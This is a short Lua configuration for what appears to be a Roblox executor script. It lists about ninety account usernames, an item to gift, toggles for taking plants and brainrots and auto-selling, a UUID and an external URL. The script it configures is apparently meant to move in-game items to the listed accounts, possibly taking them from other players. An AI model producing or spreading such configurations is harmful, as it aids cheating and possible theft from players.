getgenv().Config = {
    ["Account Main"] = {
        "SebastianPrism200389",
        "Thund3rStar58",
        "XxGlitchChillStreamx",
        "LukeRavenM00n2009",
        "ChloePrismVoid66",
        "Infern0Craft49",
        "FlickN3on28",
        "Blad3B3astMax2015",
        "ViperDarkPh0enix2019",
        "JellyAqua201889",
        "XxThunderBladeBeastx",
        "XxCyber_SkaterxX2024",
        "DuckOrbit72",
        "XxEmmaLi0nxX78",
        "MaxTigerChaos2012",
        "LeviSonicHyper",
        "Flash_Ace82",
        "EthanGamerNight2022",
        "XxMaxLightxX25_YT",
        "FlickFuryChaos2013",
        "XX_StormyLegendCraze",
        "MasonRiftBeast2002",
        "XxB3astN0vaxX25",
        "Build3r_Craft201123",
        "XxC0d3Arr0wxX2023",
        "AddisonDanc3rOrbit20",
        "HyperPandaBac0n2005",
        "AvaAquaJ3llyYT",
        "Qu33nAqua58YT",
        "IsaacCyberLight",
        "RavenLion202147",
        "CrazeShadowRogue",
        "Fusi0n_Blizzard97",
        "LeviMasterW0lf",
        "XxBaconCrystalMagicx",
        "St3alth_Void72",
        "OLIV3R_Vip3r43",
        "ChloeToxicGamer",
        "XxHyperZapBlizzardxX",
        "XxLogan_ChillxX54",
        "XxFoxMysticxX86",
        "XX_MasterThunderAlph",
        "Xx_WilliamLightPulse",
        "XxZoeLionxX2013",
        "Pixel_Flick201916",
        "HyperFlickCode",
        "MasonStarRaven2008",
        "EagleLightPixel2016",
        "Levi_Turbo23",
        "PlayzByte19_YT",
        "Crystal_Zap2014YT",
        "ArrowFlashPanda2020",
        "AceVortex36",
        "Stormy_Omega64",
        "Hunt3rTig3r22",
        "CrystalVenomPrism201",
        "L0ganCha0s95",
        "MasonSlime61",
        "XxBeastStealthxX32",
        "Bac0nPrimalC00ki3",
        "FusionPixelBane82",
        "XxBrooklynnFuryCyber",
        "EthanCyberNight2010",
        "JulianFurySab3r",
        "PixelRogue201333",
        "HunterNeonRocket2014",
        "MaxCyb3rDrift",
        "DriftJ3llyKnight61",
        "GraysonFireFury72",
        "Tiger_Thunder61",
        "XxJulianSparkInf3rno",
        "GalaxyVortexGolden20",
        "GraceVenomOmega2002",
        "ClawAlpha201581",
        "LionPixelated95",
        "XX_JacksonChaosSlim3",
        "Rogu3DuckChas3",
        "NoahPrismKnight2002",
        "Ace_S0NIC2022",
        "SlimeIceOmega2011",
        "UltraDarkInferno2009",
        "XxWilliamBladeInfern",
        "CHILL_Pho3nix2003",
        "WraithFuryFox",
        "Micha3lWolf81YT",
        "Stealth_Viper92",
        "StealthPrismDark21",
        "OwenCircuit88",
        "Bl0ckFr0stBlade",
        "GlitchDawnMoon2016",
        "XxCrystalDuckPowerxX",
    },
    ["Item Gift"] = {
        "Shroombino",
    },
    ["Take Plants"] = true,
    ["Auto Sell If Found PopUp"] = true,
    ["Custom"] = {
        ["Enable"] = false,
        ["Min"] = 1000,
        ["Max"] = 90000,
    },
    ["Take Brainrots"] = false,
    ["UUID"] = "Dracular2222",
    ["Url"] = "https://yummydata.click"
}
